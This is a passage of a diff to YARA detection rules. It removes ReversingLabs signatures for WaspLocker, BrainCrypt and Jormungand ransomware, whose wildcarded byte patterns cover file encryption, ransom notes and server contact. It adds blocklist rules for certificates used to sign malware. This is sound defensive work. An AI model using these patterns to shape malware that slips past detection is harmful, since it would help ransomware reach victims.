-            E8 ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 56 E8 ?? ?? ?? ?? EB ?? 6A ?? 6A ?? E8 ?? ??
-            ?? ?? 8B D8 83 C4 ?? 85 DB 75 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 57 EB ?? 57 68 ?? ?? ??
-            ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ??
-            85 C0 74 ?? 8B 54 24 ?? 53 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4 ??
-            57 E8 ?? ?? ?? ?? 83 C4 ?? 53 E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 8B 35 ?? ??
-            ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74 24 ?? FF 15
-        }
-		$create_crypt_context = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ??
-            ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 C8 ?? 8B 4D ?? 33 CD E8 ?? ?? ??
-            ?? 8B E5 5D C2 ?? ?? 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
-            ?? 6A ?? 50 FF D6 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 8D 45 ?? 50 FF
-            D6 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 8D 45 ?? 50 FF D6 85 C0 75 ??
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 8D 45 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 68 ?? ?? ?? ?? 56 6A ??
-            FF 15 ?? ?? ?? ?? 8D 45 ?? 89 35 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D
-            04 45 ?? ?? ?? ?? 50 FF 35 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ??
-            ?? ?? ?? 85 C0 75 ?? 50 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 8B 45 ?? 5E 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ??
-            33 C0 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $create_crypt_context ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BEAR AND CILLA LTD" and pe.signatures [ i ] . serial == "0f:d2:b1:9a:94:1b:70:09:cc:72:8a:37:cb:1b:10:b9" and 1560470400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Wasplocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2D88C0Af1Fe2609961C171213C03Bd23 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects WaspLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "596bf965-700a-58f5-b0e5-61ec57c23a3e"
-		date = "2022-06-28"
-		modified = "2022-06-28"
+		id = "0e844bef-1cfe-5eba-af4d-d8477e55470c"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.WaspLocker.yara#L1-L76"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14186-L14202"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "852ec52328fca36d651e3176ac33a57ce26cefecadc2aad27235548e5b9813c1"
+		logic_hash = "2d181b9b517732f14d196c1a6c5661d8de4dbbfe6f120954dd3f9dcad00ff0fe"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "WaspLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            50 50 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? 51 50 50 50 56 FF 15 ?? ?? ?? ?? 85 C0
-            75 ?? 57 53 E8 ?? ?? ?? ?? 8D 4E ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            A8 ?? 75 ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 3B 85 ?? ?? ?? ?? 76 ?? 8D 85 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? 59 03 C2 B9 ?? ?? ?? ?? 3B C1
-            7D ?? 8D 85 ?? ?? ?? ?? 2B CA 50 51 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
-            74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? EB ?? 85 DB 0F 84
-            ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 85 FF 75 ?? 33 C0 EB ?? 57 E8 ?? ?? ?? ?? 59 50 57
-            8D 4B ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 4E ?? E8 ?? ?? ?? ?? 33 C0 40 E8 ?? ?? ??
-            ?? C2 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33
-            F6 89 75 ?? 33 FF 89 7D ?? 21 75 ?? 21 75 ?? 39 3D ?? ?? ?? ?? 75 ?? 8D 45 ?? 50 E8
-            ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 74 ?? FF 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B F0 89 75 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? C2
-        }
-		$drop_aux_files = {
-            A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 6A ?? 66 89 41 ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 56 6A ?? FF 15 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 85 C0 74 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 FF 15
-            ?? ?? ?? ?? 8B F8 85 FF 74 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B
-            F0 83 C4 ?? 85 F6 74 ?? 56 FF B5 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 6A ?? 6A ?? 56
-            E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68
-            ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
-            ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
-            ?? ?? 56 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 6A ?? 56 FF 15 ?? ??
-            ?? ?? 50 89 85 ?? ?? ?? ?? E8
-        }
-		$drop_ransom_notes = {
-            89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0
-            75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8
-            ?? ?? ?? ?? 8B C8 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8B 40 ?? FF D0 83 C0 ?? 89 85 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            8B C8 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8B 40 ?? FF D0 83 C0 ?? 89 85 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? B9 ?? ?? ?? ?? 8D
-            51 ?? 90 8A 01 41 84 C0 75 ?? 2B CA 51 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B C8 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8B 40 ?? FF D0 83
-            C0 ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            84 C0 75
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $drop_aux_files ) and ( $drop_ransom_notes )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zhuzhou Lizhong Precision Manufacturing Technology Co., Ltd." and pe.signatures [ i ] . serial == "2d:88:c0:af:1f:e2:60:99:61:c1:71:21:3c:03:bd:23" and 1683676800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Braincrypt : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6E7Cc176062D91225Cfdcbdf5B5F0Ea5 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BrainCrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "190798d5-594d-5b80-aa0e-8d7ff167f1c0"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "cb6ae82f-ac1e-528d-aa17-6dc14019793c"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.BrainCrypt.yara#L1-L121"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14204-L14220"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "85866d6ffa136bf3ed27bbab55ae5430af4a1363930ebacab0df9ad24f8734cb"
+		logic_hash = "1d2ffa7ec3559061432c2aff23f568cb580fb9093d0af7d8a6a0b91add89c9cc"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BrainCrypt"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$get_files_for_encryption_32 = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 80 7C 24
-            ?? ?? 74 ?? 8B 5C 24 ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? BB ?? ?? ?? ?? 89 5C 24 ??
-            E8 ?? ?? ?? ?? 83 C4 ?? C3 83 3D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 1D ?? ?? ?? ??
-            83 C3 ?? FC 8B 0B 89 0C 24 8B 4B ?? 89 4C 24 ?? 83 3D ?? ?? ?? ?? ?? 0F 86 ?? ?? ??
-            ?? 8B 1D ?? ?? ?? ?? 83 C3 ?? 8D 7C 24 ?? FC 8B 0B 89 0F 8B 4B ?? 89 4F ?? E8 ?? ??
-            ?? ?? 8B 5C 24 ?? 89 1D ?? ?? ?? ?? 8B 5C 24 ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 89 1D ??
-            ?? ?? ?? 8B 5C 24 ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? BB ?? ?? ?? ?? 89 5C 24 ?? E8
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 0C 24 8B 44 24 ?? C7 04 24 ?? ?? ?? ?? 89 4C 24 ?? 89
-            4C 24 ?? 89 44 24 ?? 89 44 24 ?? BB ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 5C 24 ?? FC 8B 0B 89 0C 24 8B 4B ?? 89 4C 24 ?? E8 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? BD ?? ?? ?? ?? 89 2C 24 89 5C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 0F 0B E8 ?? ?? ?? ?? 0F 0B E8 ?? ?? ?? ?? E9
-        }
-		$encrypt_file_32 = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 8B 5C 24
-            ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? 8B 44 24
-            ?? 89 54 24 ?? 89 14 24 89 4C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 44 24 ?? 8B 5C 24 ??
-            89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 54 24
-            ?? 8B 4C 24 ?? 8B 44 24 ?? 8B 5C 24 ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? 89 54 24 ??
-            89 54 24 ?? 89 4C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? C3 E8 ?? ?? ?? ?? E9
-        }
-		$attach_to_server_32 = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 31 DB 89
-            5C 24 ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 89 CF 83 F9 ??
-            0F 84 ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 89 4C 24 ?? 89 0C 24 83 3C 24 ?? 0F 84 ?? ??
-            ?? ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89
-            1C 24 83 3C 24 ?? 0F 84 ?? ?? ?? ?? BB ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 1C 24 83 3C 24 ?? 0F 84 ?? ?? ?? ?? BB ?? ?? ?? ??
-            89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 1C 24 83 3C 24 ??
-            0F 84 ?? ?? ?? ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B
-            44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 31 DB 89 5C 24 ?? 89 5C 24 ?? 31 ED 39 E8 0F 85
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 4C 24 ?? 89 0C 24 89 44 24 ?? 89 44 24
-            ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 48 ?? 8B 68
-            ?? 89 6C 24 ?? 89 6C 24 ?? 89 4C 24 ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 8D 59 ?? C7 04 24
-            ?? ?? ?? ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? C7 04 24 ?? ?? ??
-            ?? 8B 44 24 ?? 83 F8 ?? 74 ?? 83 C0 ?? 8D 7C 24 ?? FC 8B 08 89 0F 8B 48 ?? 89 4F ??
-            E8 ?? ?? ?? ?? 8D 5C 24 ?? FC 8B 0B 89 0C 24 8B 4B ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B
-            54 24 ?? 8B 4C 24 ?? 8B 44 24 ?? C7 04 24 ?? ?? ?? ?? 89 54 24 ?? 89 54 24 ?? 89 4C
-            24 ?? 89 4C 24 ?? 89 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 5C 24 ?? 8B
-            5C 24 ?? 89 5C 24 ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3
-        }
-		$get_files_for_encryption_64 = {
-            65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83
-            EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 0F B6 44 24 ?? 84 C0 0F 85 ?? ?? ?? ?? 48 8B 05
-            ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 83 F9 ?? 0F 86 ?? ?? ?? ?? 48 8B 48 ?? 48 8B 40
-            ?? 48 89 0C 24 48 89 44 24 ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 83 F9 ??
-            0F 86 ?? ?? ?? ?? 48 8B 48 ?? 48 8B 40 ?? 48 89 4C 24 ?? 48 89 44 24 ?? E8 ?? ?? ??
-            ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 89 0D ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 84 C9 0F 85
-            ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 04 24 48 8B 44 24 ?? 48 89 44
-            24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 04 24
-            48 8B 4C 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24 ?? 48 8D 05 ?? ??
-            ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B
-            4C 24 ?? 48 89 04 24 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 C4 ?? C3 48
-            8D 0D ?? ?? ?? ?? 48 89 0C 24 48 89 44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 0F 0B 48 8B 44 24 ?? 48 89 04 24 48 8B 44 24 ?? 48 89 44 24 ?? 48 8D 05 ?? ??
-            ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? E9
-        }
-		$attach_to_server_64 = {
-            65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83
-            EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 84 24 ?? ?? ??
-            ?? ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 04 24 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 89
-            7C 24 ?? 84 07 0F 57 C0 48 83 C7 ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48
-            8B 6D ?? 48 8B 44 24 ?? 48 89 04 24 48 8B 4C 24 ?? 48 89 4C 24 ?? 48 8B 4C 24 ?? 48
-            89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 04 24 48 8D 0D ?? ?? ?? ?? 48 89 4C
-            24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 04 24 48 8D 0D
-            ?? ?? ?? ?? 48 89 4C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ??
-            48 89 04 24 48 8B 4C 24 ?? 48 89 4C 24 ?? 48 8B 4C 24 ?? 48 89 4C 24 ?? E8 ?? ?? ??
-            ?? 48 8B 44 24 ?? 48 8B 48 ?? 48 8B 10 48 8B 58 ?? 48 8B 40 ?? 48 39 CB 0F 87 ?? ??
-            ?? ?? 48 29 D9 48 29 D8 48 85 C0 0F 84 ?? ?? ?? ?? 48 C7 04 24 ?? ?? ?? ?? 48 01 DA
-            48 89 54 24 ?? 48 89 4C 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C
-            24 ?? 48 89 0C 24 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B
-            48 ?? 48 8B 50 ?? 84 01 48 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 48 83 C1 ?? 48 89 4C 24
-            ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 04 24 48 8B 44
-            24 ?? 48 8B 48 ?? 48 8B 40 ?? 48 89 4C 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44
-            24 ?? 48 8B 4C 24 ?? 48 89 04 24 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B
-            4C 24 ?? 48 8B 54 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24 ?? 48 89
-            54 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 89 44 24 ?? 48 89 8C 24 ??
-            ?? ?? ?? 90 E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 C4 ?? C3 90 E8 ?? ?? ?? ?? 48 8B 6C
-            24 ?? 48 83 C4 ?? C3 31 DB E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 0B E8 ?? ?? ?? ?? E9
-        }
-		$encrypt_file_64 = {
-            65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83
-            EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 8B 44 24 ?? 48 89 04 24 48 8B 44 24 ?? 48 89
-            44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 89 04 24 48
-            89 4C 24 ?? 48 89 54 24 ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48
-            89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48
-            8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 48 89 1C 24 48 8B 5C 24 ?? 48 89 5C 24 ??
-            48 89 44 24 ?? 48 89 4C 24 ?? 48 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 8B 6C 24 ?? 48 83 C4 ?? C3 E8 ?? ?? ?? ?? E9
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $get_files_for_encryption_32 and $encrypt_file_32 and $attach_to_server_32 ) or ( $get_files_for_encryption_64 and $encrypt_file_64 and $attach_to_server_64 ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SG Internet" and pe.signatures [ i ] . serial == "6e:7c:c1:76:06:2d:91:22:5c:fd:cb:df:5b:5f:0e:a5" and 1317945600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Jormungand : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Cecedd2Efc985C2Dbf0019669D270079 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Jormungand ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "418c3d9f-2338-593f-a8ec-a1e25afa50d4"
-		date = "2021-10-22"
-		modified = "2021-10-22"
+		id = "60a3e63c-4f44-5c75-9928-69859d77af3e"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Jormungand.yara#L1-L135"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14222-L14240"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "049eb4533b37d8d72e50dd1e803a897758386643770d47b3e7690f58e44d5236"
+		logic_hash = "1dfb5959db6929643126a850de84e54a84d7197518cde475c802987721b71020"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Jormungand"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$drop_ransom_note = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 8D 44 24 ?? 3B 41 ?? 0F 86 ?? ?? ?? ?? 81 EC
-            ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ??
-            ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89
-            84 24 ?? ?? ?? ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 54 24 ?? 89 14 24 8B 94 24 ?? ?? ?? ??
-            89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ??
-            8B 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 1C 24 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 89 44 24
-            ?? 89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 8B 4C 24
-            ?? 89 4C 24 ?? 8B 54 24 ?? 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 89
-            5C 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 8D 1D ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ??
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 04 24 89 4C 24 ?? C7 44 24 ??
